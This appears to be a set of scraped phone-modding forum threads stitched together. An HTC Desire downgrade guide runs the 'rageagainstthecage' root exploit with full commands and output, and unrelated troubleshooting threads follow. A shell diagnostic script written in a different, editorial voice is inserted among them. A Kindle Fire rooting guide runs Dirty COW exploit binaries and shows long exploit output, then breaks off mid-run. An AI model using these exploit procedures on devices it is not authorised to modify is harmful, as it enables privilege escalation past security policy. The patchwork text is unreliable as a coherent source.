After my new Desire updated by OTA to 2.2, my HBoot upgraded to 0.93.001
As a result, I am no longer able to root it again or flash any cooked ROM.... It is such a nightmare for me. So I decided to go to the HTC service center and ask for a factory restore to Android 2.1; unfortunately the guy stated that due to my own fault - hacking the bootloader - there is no way to downgrade the software anymore. I need to pay extra money for a circuit board replacement. I am so angry with the reply; my phone is actually working fine with the OTA 2.2 version (it is the official release for Taiwan), all I want to do is request a downgrade to the official 2.1, so why do I need to replace a circuit board????
Anyway after a few hours, I figured out a solution and it is now working fine with Hboot 0.8 and then re-flashed to a customized cooked FroYo rom
Here are the steps: (be careful, I am not responsible for any damage due to these procedures; also you need to have basic knowledge of using the Android adb tools)
0.) Download this good program: http://evo4g.me/downloads/evo-root.zip (Credit goes to djR3Z)
Download this file to "PB99IMG.zip" http://shipped-roms.com/shipped/Bra...8U_4.06.00.02_2_release_126984_signed_txt.zip
1.) Make a NEW Goldcard (best using a FAT32-formatted 4GB or 2GB micro SD)
http://www.klutsh.com/dlfiles/GoldCardTool-0.0.5.rar
2.) Find your CID ==> e.g. HTC__622 (someone said 11111111 also worked, but if you can query it, why not input your own?)
fastboot oem boot <--- run this command; it will show your own CID
3.) http://ks33673.kimsufi.com/misc/
and Create your own "mtd0.img"
>adb push flash_image /data/local/
>adb push rageagainstthecage-arm5.bin /data/local/tmp/
>adb push mtd0.img /sdcard/
>adb push PB99IMG.zip /sdcard/
>adb shell
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/flash_image
cd /data/local/tmp
./rageagainstthecage-arm5.bin
If you see:
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 74
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
> adb shell
# <---- you will see this good prompt
cd /data/local
./flash_image misc /sdcard/mtd0.img <---- make sure you're connected to the PC not in Disk drive mode
5.Shutdown your device
6.Hold volume DOWN and press power button
7.Wait until PB99IMG.ZIP is found and verified. If that fails, check if you named the file the right way and it's located in the root of your SD.
8.Press volume UP to start the update.
9.Wait until all steps are done. DON’T POWER OFF YOUR DEVICE!
10.After the downgrade progress has finished press volume UP to reboot.
Now you're back on 2.1 with HBoot 0.80
(Please remember to delete the file PB99IMG.zip from your SDcard / folder)
If you want root again:
Navigate to http://www.unrevoked.com to root as usual
Interesting, a root exploit for froyo has been found? Though any downgrade of hboot is unnecessary. The rooting allows you to fix the misc partition which will let you flash any RUU you want.
My Desire show : Main Version is older! Update Fail!
setupspeed said:
My Desire show : Main Version is older! Update Fail!
what is the issue?
tell me what steps being failed...
hkfriends said:
what is the issue?
tell me what steps being failed...
read PB99IMG.ZIP finished, then checking PB99IMG.ZIP => fail
setupspeed said:
read PB99IMG.ZIP finished, then checking PB99IMG.ZIP => fail
Have u flashed Mtd0.img ok?
hkfriends said:
Have u flashed Mtd0.img ok?
Mtd0.img ok , pursuant step => still fail
better add some screenshots bro
I have got hboot 0.93 with vodafone froyo and an amoled-display (no slcd).
Do the method of
android-tutorials.org/dev/?page_id=78
work (sorry, can't post the whole link because I am newly registered, add www)?
Or do I have to use the method from post #1 in this thread?
cordezz said:
I have got hboot 0.93 with vodafone froyo and an amoled-display (no slcd).
Do the method of
android-tutorials.org/dev/?page_id=78
work (sorry, can't post the whole link because I am newly registered, add www)?
Or do I have to use the method from post #1 in this thread?
Try teppic74's tool, I think it will be easier and it's the same as mine too!
http://forum.xda-developers.com/showthread.php?t=768256
C:\adb>adb push flash_image /data/local/
adb server is out of date. killing...
* daemon started successfully *
774 KB/s (26172 bytes in 0.033s)
C:\adb>adb push rageagainstthecage-arm5.bin /data/local/tmp/
478 KB/s (5392 bytes in 0.011s)
C:\adb>adb push mtd0.img /sdcard/
1807 KB/s (655360 bytes in 0.354s)
C:\adb>adb push PB99IMG.zip /sdcard/
1550 KB/s (144169877 bytes in 90.807s)
C:\adb>adb shell
$ chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
$ chmod 0755 /data/local/flash_image
chmod 0755 /data/local/flash_image
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage-arm5.bin
./rageagainstthecage-arm5.bin
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 671
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
C:\adb>adb shell
adb server is out of date. killing...
* daemon started successfully *
# cd /data/local
cd /data/local
# ./flash_image misc /sdcard/mtd0.img
./flash_image misc /sdcard/mtd0.img
# exit
exit
C:\adb>
-------------------------------------------------------------
my steps, correct?
Yes, seems correct..
have you made gold card?
what is your phone? OEM or branded?
what is the original Hboot version?
setupspeed said:
C:\adb>adb push flash_image /data/local/
adb server is out of date. killing...
* daemon started successfully *
774 KB/s (26172 bytes in 0.033s)
C:\adb>adb push rageagainstthecage-arm5.bin /data/local/tmp/
478 KB/s (5392 bytes in 0.011s)
C:\adb>adb push mtd0.img /sdcard/
1807 KB/s (655360 bytes in 0.354s)
C:\adb>adb push PB99IMG.zip /sdcard/
1550 KB/s (144169877 bytes in 90.807s)
C:\adb>adb shell
$ chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
chmod 0755 /data/local/tmp/rageagainstthecage-arm5.bin
$ chmod 0755 /data/local/flash_image
chmod 0755 /data/local/flash_image
$ cd /data/local/tmp
cd /data/local/tmp
$ ./rageagainstthecage-arm5.bin
./rageagainstthecage-arm5.bin
[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C
[*] checking NPROC limit ...
[+] RLIMIT_NPROC={3319, 3319}
[*] Searching for adb ...
[+] Found adb as PID 671
[*] Spawning children. Dont type anything and wait for reset!
[*]
[*] If you like what we are doing you can send us PayPal money to
[*] [email protected] so we can compensate time, effort and HW costs.
[*] If you are a company and feel like you profit from our work,
[*] we also accept donations > 1000 USD!
[*]
[*] adb connection will be reset. restart adb server on desktop and re-login.
$
C:\adb>adb shell
adb server is out of date. killing...
* daemon started successfully *
# cd /data/local
cd /data/local
# ./flash_image misc /sdcard/mtd0.img
./flash_image misc /sdcard/mtd0.img
# exit
exit
C:\adb>
-------------------------------------------------------------
my steps, correct?
hkfriends said:
Yes, seems correct..
have you made gold card?
what is your phone? OEM or branded?
what is the original Hboot version?
gold card => yes
My phone => HTC Desire
Hboot version => 0.93.0001
i have this error "error writing misc: Permission denied"
in this step: "./flash_image misc /sdcard/mtd0.img"
Noob question
Using your method wont brick my phone right? My phone details are below:
Unit: HTC Desire
ROM: FroYo OTA (Unbranded)
BOOTLoader: 0.93
Software:2.13.707.1
Kernel:2.6.32.15
Just use my tool instead, it's much easier.
Doesn't Unrevoked3, the tool that is used to root phones, support hboot 0.93 on unbranded / unlocked phones? So this step is un-necessary on unbranded / unlocked phones?
Did it work at all?
Hi,
I too want to downgrade my HTC Desire from 2.2 to 2.1 because after the upgrade to 2.2 with hboot 0.93 my desire has stopped connecting to the H or 3g network.
Did this guide work for anyone at all?
HI
CAN SOMEONE HELP ME TO GET THE ROM IMAGE VERSION 2.13.707.1? I NEED THE EXE FILE, THAT'S THE ONLY WAY I KNOW TO INSTALL THE ROM!!!!
MY PHONE TRIED TO UPGRADE FROM THE PHONE, SOMETHING WENT WRONG AND IT SWITCHES ON AND GETS STUCK IN A WHITE SCREEN WITH THE htc GREEN LOGO . . . I TRIED TO INSTALL THE LATEST ROM FROM MY COMPUTER BUT THE IMAGE ON THAT IS 2.10.405.2 . I WOULD REALLY APPRECIATE IT IF SOMEONE CAN HELP ME
black screen
I got a black screen after downgrade. Also after restart the phone
Desire
So I'm on rogers trying to change my CID. When I used the one click all it did was say it couldn't be found. All other batch installers just open up in command prompt and close again..... I have usb debugging turned on and I have it in charge only. My current RUU is 1.73. My boot loader is unlocked and I am rooted.
I've even tried the Linux tool and all it did was say ./adb was not valid.
Sorry if I'm being a complete idiot here but I want to start trying custom roms...
bobruels44 said:
So I'm on rogers trying to change my CID. When I used the one click all it did was say it couldn't be found. All other batch installers just open up in command prompt and close again..... I have usb debugging turned on and I have it in charge only. My current RUU is 1.73. My boot loader is unlocked and I am rooted.
I've even tried the Linux tool and all it did was say ./adb was not valid.
Sorry if I'm being a complete idiot here but I want to start trying custom roms...
For the Linux tool (which I wrote), you downloaded the file, extracted the archive, opened a terminal window IN the archive folder, typed "chmod +x toolbox.sh" <enter> and then "./toolbox.sh" <enter>?
If so, try going back to the terminal window and typing "chmod +x adb" <enter> and then "./toolbox.sh" <enter>
HTH,
Billy
Sent from my HTC One X using Tapatalk 2
yes that is what I did and all it did was say /adb is not a valid command...
I was in the correct directory as I could open the tool,
then when installing the drivers for example all it said was
\adb is not a recognized command
Almost done, please reboot your computer now....
bobruels44 said:
yes that is what I did and all it did was say /adb is not a valid command...
I was in the correct directory as I could open the tool,
then when installing the drivers for example all it said was
\adb is not a recognized command
Almost done, please reboot your computer now....
JeepFreak said:
If so, try going back to the terminal window and typing "chmod +x adb" <enter> and then "./toolbox.sh" <enter>
The above should work, but if not, try downloading the tool again and starting from the beginning. I made a small change that might help. Were you using the SuperCID script or the One XL Toolbox?
http://www.slicky.net/code/onexl/OneXL-Toolbox.tar.gz
http://www.slicky.net/code/onexl/SuperCID-OneXL.tar.gz
HTH,
Billy
I've tried both actually.
Here is the error message from the tool box..
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
cp: cannot stat `tmp/mmcblk0p4': No such file or directory
xxd: tmp/mmcblk0p4: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
We don't recognize your current CID. If you're sure that your
phone is the S4 version, HTC One XL, contact me on XDA and I
will see if I can get you going.
I am rooted and the bootloader is unlocked.....
Could it be because I'm still S-ON? I just kinda figured that everyone was still S-ON.....
Edit:
There is a HIGH chance I'm being an idiot and missing something stupid...
bobruels44 said:
I've tried both actually.
Here is the error message from the tool box..
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
./adb: error while loading shared libraries: libncurses.so.5: cannot open shared object file: No such file or directory
cp: cannot stat `tmp/mmcblk0p4': No such file or directory
xxd: tmp/mmcblk0p4: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
grep: tmp/mmcblk0p4.txt: No such file or directory
We don't recognize your current CID. If you're sure that your
phone is the S4 version, HTC One XL, contact me on XDA and I
will see if I can get you going.
I am rooted and the bootloader is unlocked.....
Could it be because I'm still S-ON? I just kinda figured that everyone was still S-ON.....
Edit:
There is a HIGH chance I'm being an idiot and missing something stupid...
Hmmmm... type "ls -l" <enter> from a terminal in the toolbox directory. (That's "LS -L", but lower case, btw). Copy and paste the output here.
Billy
@ubuntu:~/Desktop/OneXL-Toolbox$ ls -l
total 2922
-rw-rw-r-- 1 casey casey 82 May 23 18:13 51-android.rules
-rwxrwxr-x 1 casey casey 159644 May 9 09:34 adb
-rw-rw-r-- 1 casey casey 42916 May 6 01:36 apstacon.conf
-rw-rw-r-- 1 casey casey 2005736 Dec 28 22:32 busybox
-rw-rw-r-- 1 casey casey 42940 May 6 01:36 hostapd_default.conf
-rw-rw-r-- 1 casey casey 136 May 25 20:41 README..txt
-rw-rw-r-- 1 casey casey 91980 May 7 22:23 su
-rw-rw-r-- 1 casey casey 570342 May 7 22:22 Superuser.apk
-rw-r--r-- 1 casey casey 12288 May 22 19:14 telephony.db
-rw-r--r-- 1 casey casey 12288 May 23 19:51 telephony.db.virgin
drwxrwxr-x 2 casey casey 1024 May 28 16:14 tmp
-rwxrwxr-x 1 casey casey 15101 May 29 08:48 toolbox.sh
-rwxrwxr-x 1 casey casey 9947 May 28 09:25 undo-toolbox.sh
-rw-rw-r-- 1 casey casey 4436 May 6 01:33 WCNSS_qcom_cfg_default.ini
-rw-rw-r-- 1 casey casey 351 May 23 10:50 wpa_supplicant.conf
Oh, you know what... I bet you need to install the ncurses library. Do you know how to do that? If not, what package manager do you use (rpm, yum, aptitude, etc)? Or what Linux distribution are you running?
Billy
Sent from my HTC One X using Tapatalk 2
I use ubuntu...
I'm not familiar with those... my knowledge of Linux really comes down to school use, where they get mad if you start installing software. However I am familiar with a command prompt so I'm only mostly useless
bobruels44 said:
I use ubuntu...
I'm not familiar with those... my knowledge of Linux really comes down to school use, where they get mad if you start installing software. However I am familiar with a command prompt so I'm only mostly useless
HAHA. Is it a 64 bit system? If so, try this:
"sudo apt-get install ia32-libs" <enter>
If not, LMK,
Billy
Download this Guide ...
Try downloading the Guide from the first post in the following link:
http://forum.xda-developers.com/showthread.php?t=1678308
Go to Step 2 on Page 10.
Peter
Desire S
Hboot 2.00.2002 o-on rl dev->unlocked
installed = rooted stock RUU_SAGA_ICS_35_S_HTC_EU_14.01.401.2_20.76.30.0835_3831.19.00.110_275068
when i replace boot.img ...from ---> .V7.1 STABLE FOR SENSE 4 | EXPERIMENTAL FOR SENSE 3.6/MIUIv4
I only got black screen and reboot to recovery (after some time)
flashing org boot.img from ruu zip ... restores phone operation again
Why is this kernel not working .. because of hboot???
(installed busybox 1.20.2 with the busybox installer from market)... ?
Thanks for HELP!
Hboot 2.00.2002 is ENG S-OFF
Yours probably is 2.02.0002. Be more careful about such things.
You have to modify one number in the zip before flash. Read the kernel thread again
Sent from my HTC Desire S
amidabuddha said:
Hboot 2.00.2002 is ENG S-OFF
Yours probably is 2.02.0002. Be more careful about such things.
You have to modify one number in the zip before flash. Read the kernel thread again
Sent from my HTC Desire S
ok! mine is 2.02.0002. ----- > S-ON Rl (****unlocked****)
mount("ext4", "EMMC", "/dev/block/mmcblk0p29", "/system/lib"); --- The line is totally missing from "updater-script" in Tweaked3_7.1-Sense3.6-bcm4329.zip
adding the mount line with 28 or 29 does not solve the issue :/ .... but 29 should be the right one, as I looked up the mount command in the terminal... and system/lib is --> dev/block/mmcblk0p29
Flashing ZIP with 4ext recovery (latest)...
Obviously you don't like to read instructions.
Sense3.6 is for custom ROMs not for Stock
Anyway there is a new installer - use it
Sent from my HTC Desire S
amidabuddha said:
Obviously you don't like to read instructions.
Sense3.6 is for custom ROMs not for Stock
Anyway there is a new installer - use it
Sent from my HTC Desire S
ok. New installer works.
oTeMpLo said:
ok. New installer works.
stock ics rom.
8.0 installer fails to create the init.d folder !!!! /system/etc/init.d .. after manually creating it .. it copies scripts to the init.d folder,,
after that fixing permissions with fix_perm.bat .. as some init.d scripts have wrong permissions..
but modules still don't get loaded.
lsmod --> only wifidriver listed.
no zram ---> etc...
free returns ---> swap 0 0 0
manually starting ./51-zram works!!!
just init.d scripts don't get processed.
oTeMpLo said:
stock ics rom.
8.0 installer fails to create the init.d folder !!!! /system/etc/init.d .. after manually creating it .. it copies scripts to the init.d folder,,
after that fixing permissions with fix_perm.bat .. as some init.d scripts have wrong permissions..
but modules still don't get loaded.
lsmod --> only wifidriver listed.
no zram ---> etc...
free returns ---> swap 0 0 0
manually starting ./51-zram works!!!
just init.d scripts don't get processed.
Code:
adb shell chmod 750 /system/etc/init.d/{scriptname}
adb shell chown 0.2000 /system/etc/init.d/{scriptname}
reboot
amidabuddha said:
Code:
adb shell chmod 750 /system/etc/init.d/{scriptname}
adb shell chown 0.2000 /system/etc/init.d/{scriptname}
reboot
yes i run fix_perm.bat
[email protected]:/system/etc/init.d # ls -l
ls -l
-rwxr-x--- root shell 157 2012-10-02 21:31 50-s2wEB
-rwxr-x--- root shell 68 2012-10-02 21:31 52-cifs
-rwxr-x--- root shell 107 2012-10-02 21:31 54-ntfs
-rwxr-x--- root shell 80 2012-10-02 21:31 53-kineto_gan
-rwxr-x--- root shell 117 2012-10-02 21:31 51-zram
[email protected]:/system/etc/init.d #
[email protected]:/system/lib/modules # ls -l
ls -l
-rw-r--r-- root root 320724 2008-08-01 14:00 bcm4329.ko
-rw-r--r-- root root 3118416 2012-10-02 21:31 cifs.ko
-rw-r--r-- root root 2262132 2012-10-02 21:31 ntfs.ko
-rw-r--r-- root root 29536 2012-10-02 21:31 nls_utf8.ko
-rw-r--r-- root root 175844 2012-10-02 21:31 kineto_gan.ko
-rw-r--r-- root root 218212 2012-10-02 21:31 zram.ko
[email protected]:/system/lib/modules #
Any other idea?
installed busybox 1.20.2 in /system/xbin ... some commands are still linked to "toolbox" ?!?
Thanks for help!
Check if /system/xbin/run-parts is there
amidabuddha said:
Check if /system/xbin/run-parts is there
[email protected]:/system/xbin # ls -l run*
ls -l run*
lrwxrwxrwx root root 2012-10-02 21:08 run-parts -> /system/xbin/busybox
[email protected]:/system/xbin #
[email protected]:/system/xbin # ls -l busy*
ls -l busy*
-rwxr-xr-x root root 863436 2012-10-02 21:08 busybox
[email protected]:/system/xbin #
oTeMpLo said:
[email protected]:/system/xbin # ls -l run*
ls -l run*
lrwxrwxrwx root root 2012-10-02 21:08 run-parts -> /system/xbin/busybox
[email protected]:/system/xbin #
[email protected]:/system/xbin # ls -l busy*
ls -l busy*
-rwxr-xr-x root root 863436 2012-10-02 21:08 busybox
[email protected]:/system/xbin #
.. ok now it works.... reboot after remove and new install of busybox.....
thanks for patience with me!!! ....
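The init.d troubleshooting above comes down to three checks: each script must be a regular file that is executable, its ownership must match what fix_perm.bat sets (chmod 750, chown 0.2000, i.e. root:shell), and run-parts must resolve to a working busybox. This added script (not from the thread or from any of the tools it mentions) automates those checks on any init.d directory; it assumes a BusyBox or GNU `stat -c` is available, and the uid/gid arguments are optional so it can also be run as a non-root user on a desktop.

```shell
#!/bin/sh
# Added diagnostic for the init.d problem discussed in the thread.
# check_initd_dir DIR [UID GID]
#   Prints one line per problem found and returns 0 only when DIR is clean:
#   every entry is a regular, executable file and (when UID GID are given,
#   e.g. 0 2000 for root:shell) owned as expected.
check_initd_dir() {
    dir="$1"; want_uid="$2"; want_gid="$3"
    problems=0
    if [ ! -d "$dir" ]; then
        echo "missing directory: $dir"
        return 1
    fi
    for f in "$dir"/*; do
        [ -e "$f" ] || continue          # empty dir: the glob stays literal
        if [ ! -f "$f" ]; then
            echo "not a regular file: $f"
            problems=$((problems + 1))
            continue
        fi
        if [ ! -x "$f" ]; then
            echo "not executable (try chmod 750): $f"
            problems=$((problems + 1))
        fi
        if [ -n "$want_uid" ]; then
            # stat -c is GNU/BusyBox syntax (assumption: a Linux host or
            # a BusyBox stat on the device)
            owner=$(stat -c '%u:%g' "$f")
            if [ "$owner" != "$want_uid:$want_gid" ]; then
                echo "owner $owner, expected $want_uid:$want_gid (try chown $want_uid.$want_gid): $f"
                problems=$((problems + 1))
            fi
        fi
    done
    [ "$problems" -eq 0 ]
}

# check_run_parts PATH
#   run-parts is normally a symlink to busybox; -x follows the link, so a
#   dangling link (busybox removed or reinstalled elsewhere) or a
#   non-executable target is reported.
check_run_parts() {
    rp="$1"
    if [ -L "$rp" ] && [ ! -e "$rp" ]; then
        echo "dangling symlink: $rp -> $(readlink "$rp")"
        return 1
    fi
    if [ ! -x "$rp" ]; then
        echo "missing or not executable: $rp"
        return 1
    fi
    return 0
}

# Typical use on the device (root shell): audit the real locations.
if [ "${1:-}" = "--device" ]; then
    check_initd_dir /system/etc/init.d 0 2000
    check_run_parts /system/xbin/run-parts
fi
```

Run it with `--device` from a root shell on the phone; without arguments it only defines the two functions so they can be sourced and pointed at any directory.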
Update: While this still works, there's an easier method here. Please try that first.
Disclaimer #1: KingoRoot, dr.fone, and most other one-click rooting tools are characterized as malware. Should you use these tools? That decision is yours and yours alone. I do not own any of the tools that follow. All the links are to files that are publicly available.
Disclaimer #2: This is a risky undertaking. If you encounter issues or, worse, end up with a brick, I (or the others here) will try to help you, but the risk is all yours.
Disclaimer #3: This approach is not for everyone. If you lack a half-decent linear combination of (1) troubleshooting skills, (2) patience, (3) reading-comprehension skills, and (4) some love of risk, please stop here.
Disclaimer #4: I have only tried this on the 2017 HD 10. If you try this on another device type and it works, please post in the appropriate forum. If you try this on another device type and it does not work, don't be shocked.
NAQ (Never-Asked Questions):
a. What is "offline" rooting?
-- Rooting your device without needing access to the Internet (i.e., the rooting process requires no Internet connection; not on the phone/tablet, not on the computer).
b. Aren't there a gazillion rooting threads for the 2017 HD 10, each claiming to be easier than its predecessors? Why even bother with this fancy "offline" stuff?
-- All of those rooting threads use tools that require Internet access on the PC. What if those tools stop working because of server issues on their end?
-- More importantly, it's well known that these one-click rooting tools extract and transmit a ton of device-identifying information (e.g., IMEI, Serial Number, ...) that is not central to the rooting process. Why give that up?
For a few weeks now, I have been trying to come up with a rooting process that does not require any Internet access on the computer (we know KingoRoot and dr.fone need Internet access on the computer). I have finally figured out how. As a result, we should be able to root the 2017 HD 10 even if these rooting options cease to exist (assuming Amz updates are blocked at 5.6.0.1).
While Kingo does a good job of hiding its root exploits (i.e., the scripts it fetches from the cloud), the good doctor is a bit more generous (its files are downloaded onto a folder on the disk). I copied everything from that folder after a successful root attempt on my test tablet and examined each file. I was able to tinker with the scripts and binaries after moving them to /data/local/tmp on my tablet, but wasn't able to achieve anything meaningful ... until tonight. Noting the presence of some weirdly-named files in that folder, I did a simple Google search and came up with this hit. Of particular interest is method 2 (ELF). Based on that reading and armed with the files from the folder on the disk, I was able to achieve root without Internet access on my computer. I have done so multiple times, w/ and w/o a fresh sideload of the 5.6.0.0 update .bin. The process succeeds more often than it fails (when it does fail, a reboot and retry usually works), not unlike failures with Kingo or the doctor. It's the same exploit after all.
I am guessing Kingo uses a similar process, but does enough to make its scripts difficult to obtain offline. Access to the doctor's scripts and some clarity on the rooting procedure should help others on this forum make even greater progress.
Update: See my post #10 in this thread for Kingo-related instructions. To do this with Kingo, you would complete steps 4 and 5 in this OP and then move to the steps in post #10.
You will need to download a few files (for which you will, of course, need Internet on your computer):
1. Download the exploits here (it's clear that the exploit that's working for the 2017 HD 10 is Dirty COW: CVE-2016-5195): 20165195.zip and SuperSU_18+.zip and extract to their respective folders.
2. Copy all the files from the SuperSU_18+ folder into the 20165195 folder (overwriting wsroot.sh). Rename 20165195 to something simpler, say c. Inside the c folder, you should have the following binaries and scripts: ddexe, debuggerd, fileWork, install-recovery.sh, Matrix, pidof, start_wssud.sh, su, su_arm64, Superuser.apk, supolicy, toolbox, and wsroot.sh. You can delete Superuser.apk (we will be downloading SuperSU next).
3. Download the SuperSU 2.82 SR5 apk from here (or search for another source). Move it to the c folder.
4. Install the Fire's drivers and ADB+fastboot from here (if you haven't already done so).
You will not need Internet access from this point forward.
You should now have the c folder with 12 files and the SuperSU apk handy. If you lose root for whatever reason (or if you just want to test this out), you do not need KingoRoot or dr.fone. Follow these steps:
5. Do the basics:
-- Fire up your Fire.
-- On your first boot, start the process by clicking on Continue, then click on any of the WiFi choices, click Cancel, choose Not Now, and then Skip. Once the Fire gets to the home screen, pull down the notification bar and enable airplane mode.
-- Become a developer by tapping Serial Number (in Device Options) 7 times, go to Developer Options, and Enable ADB.
-- Go to Security in Settings and enable Apps from Unknown Sources.
-- Connect your Fire to the computer, Allow USB debugging on the tablet, check the popup box to Always allow from this computer (if this does not happen here, it will when you start adb next).
-- Type adb shell in an administrative command prompt. You should enter the tablet as a user.
6. On your computer, copy all the files from the c folder to the Fire's internal storage (/sdcard). Next, go to the command prompt with adb shell and copy the files to /data/local/tmp:
Code:
cp /sdcard/c/* /data/local/tmp
cd /data/local/tmp
ls -l
7. Change permissions:
Code:
chmod 755 *
8. This is the ballgame: Run:
Code:
./Matrix /data/local/tmp 2
This tells Matrix to look for files in /data/local/tmp, with "2" installing su in /system/xbin ("1" installs su8 in /system/xbin). Wait for the process to complete (it will take a minute or two). If it's successful, you will see something like the following as it completes:
Code:
[*] exploited 0x7f83021000=f97cff8c
end!!!!!!!
<WSRoot><Exploit>0</Exploit></WSRoot>
<WSRoot><Done>0</Done></WSRoot>
If it does not report success as depicted above (note that the memory address exploited might be different, but the end result has to be a "0" and "Done"), delete everything from /data/local/tmp/, (hard) reboot the tablet, and retry (starting from step 5). Failure is likely if an exploit check takes greater than 30 seconds, in which case the device may have to be manually rebooted.
This is a sample of the entire output that should be generated:
Code:
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f8325c008 end:7f8325c2d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 210148 /data/local/tmp/load1
fwrite is count 54204 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 408a0 load1 = 334e4 load2 = d3bc
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:264352
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:208
find logd pid : d0
_inject_start_s:0x7f8325c008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 210148
[*] mmap 0x7f83055000;
[*] exploit (patch)
[*] currently 0x7f83055000=8f97cff8c
sched_setaffinity: Function not implemented[*] madvise = 0x7f83055000 210148
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
sched_setaffinity: Function not implementedmadviseThread() done
procselfmemThread() done
[*] exploited 0x7f83055000=f97cff8c
[main]p_vdso_addr:0x7f8325a000 p_vdso_buffer:0x400000
[*]set_ret_jmp
[*]set_ret_jmp 400410
[*]set_ret_jmp 400420
[main] write 1
Parent is over..status == 0
socket: No such file or directory
socket = 7
ret = ffffffff
connect
: No such file or directory
ret = ffffffff
find coe f
[main] write 2
Parent is over..status == 0
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load2
warning: new file size (54204) and file old size (210148) differ
size: 54204
[*] mmap 0x7f83236000;
[*] exploit (patch)
[*] currently 0x7f83236000=8f97cff8c
sched_setaffinity: Function not implemented[*] madvise = 0x7f83236000 54204
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
sched_setaffinity: Function not implementedmadviseThread() done
procselfmemThread() done
[*] exploited 0x7f83236000=8600a5
find coe 36
Parent is over..status == 0
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/cp_sepolicy
size: 210148
[*] mmap 0x7f83021000;
[*] exploit (patch)
[*] currently 0x7f83021000=10007008600a5
checking the patch ... exploit
sleep 1s
sched_setaffinity: Function not implementedsched_setaffinity: Function not implemented[*] madvise = 0x7f83021000 210148
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
